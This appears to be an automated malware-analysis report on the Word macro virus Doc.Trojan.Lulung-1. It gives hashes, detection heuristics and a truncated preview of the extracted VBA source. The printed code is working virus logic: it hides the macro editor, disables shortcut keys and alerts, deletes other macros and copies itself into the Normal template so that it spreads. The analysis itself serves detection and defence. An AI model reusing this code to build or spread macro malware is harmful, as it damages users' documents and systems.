Doc.Trojan.Lulung-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 a2d9041e591d8275…

MALICIOUS

Office (OLE)

Size: 75.5 KB
Created: 1999-11-16 21:37:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 01ab63e844f3a411dae2b1e89802eb65
SHA-1: 7e20859e5b4904d5008c0d4f47dcdcc38931a016
SHA-256: a2d9041e591d82756ff53eed2bab8520cd704b33ad4e0bc933ab5c322a2f63d1
Risk Score: 220

Malware Insights

Doc.Trojan.Lulung-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Lulung-1. It contains legacy WordBasic macro markers and a VBA AutoOpen macro, indicating an attempt to execute code upon opening. The VBA macro appears to be designed to disable macro security features and potentially download and execute additional payloads, though the script is truncated.

Heuristics (4)

  • ClamAV: Doc.Trojan.Lulung-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Lulung-1
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 21929 bytes
SHA-256: c9f1bc0ab82a2f30d627e1d7ec1178637ad1f4a3c8873416834ed6fa4d87acd4
Detection
ClamAV: Doc.Trojan.Lulung-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ChenLung"
Attribute VB_Base = "0{758DA323-79D3-11CE-9209-8AE360A51863}{758DA31C-79D3-11CE-9209-8AE360A51863}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub Image1_Click()
MsgBox "Don't Take My Food ! If You Want It, Ask To Your Mom !", vbOKOnly, "June 08, 1971"
End Sub

Private Sub Image2_Click()
MsgBox "Hei... Don't Click This Area !", vbOKOnly, "June 08, 1971"
End Sub

Private Sub OK_Click()
If Day(Now()) = 8 And Month(Now()) = 6 Then Call Jalan
Unload Me
End Sub

Sub Jalan()
Unload Me
umur = Year(Now()) - 1971
gua$ = "Today Is My Birthday... I'm Now " & umur & " Years Old. Thank's For Your Greeting !" & Chr$(13) & "© April, 1998 - By. June 08, 1971"
MsgBox gua$, vbOKOnly, "Happy Birthday To Me !"
StatusBar = "=> HAPPY Birthday to Me !"
End Sub

Attribute VB_Name = "LungChen"
'Welcome To My Listing Program !
'Created and Programmed By. June 8, 1971
'©April, 1998 - Ciputat
'Sorry, If my program disturbs you !
'It's not danger, I just want to be your friend !

Public Mulai
Public SimpanFile
Public Ay
Public Sun
Sub AyAlways()
    Mulai = Application.DisplayAlerts
    Application.DisplayAlerts = wdAlertsNone
    Call Cek
    WordBasic.DisableAutoMacros 0
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    On Error Resume Next
    CommandBars("Tools").Controls("Macro").Delete
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    On Error GoTo 0
End Sub
Sub AyClose()
Application.DisplayAlerts = Mulai
End Sub
Sub AyBirthday()
If Day(Now()) = 8 And Month(Now()) = 6 Then ChenLung.Show
If Day(Now()) = 26 And Month(Now()) = 7 Then MsgBox "Today Is My Wife's Birthday. Happy Birthday Honey !", vbOKOnly, "Happy Birthday To My Wife"
If Day(Now()) = 8 And Month(Now()) = 2 Then MsgBox "Today Is My Wedding's Day. Thank's God !", vbOKOnly, "Happy Wedding"
End Sub
Sub Ay2()
    Call Cek
    On Error GoTo AyErr1
    Ay = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Error1a
    For i = 1 To NT.VBProject.VBComponents.Count
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "LungChen" Then Ay = True
      If (NMacr <> "LungChen") And (NMacr <> "ChenLung") And (NMacr <> "ThisDocument") Then
        Application.OrganizerDelete Source:=NT.FullName, _
            Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Error1a:
    If Ay = False Then
      On Error GoTo Error1
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "LungChen", Object:=wdOrganizerObjectProjectItems
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "ChenLung", Object:=wdOrganizerObjectProjectItems
      Templates(NT.FullName).Save
Error1:
    End If
AyErr1:
End Sub
Sub Ay2Doc()
    On Error GoTo AyErr2
    SimpanFile = 0
    Sun = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Error2a
    For i = 1 To AD.VBProject.VBComponents.Count
      NMacr = AD.VBProject.VBComponents(i).Name
      If NMacr = "LungChen" Then Sun = True
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "LungChen" Then Sun = True
      If (NMacr <> "LungChen") And (NMacr <> "ChenLung") And _
        (NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then
        Application.OrganizerDelete Source:=AD.FullName, _
          Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Error2a:
    If Sun = False Then
      On Error GoTo Error2
      Applicati
... (truncated)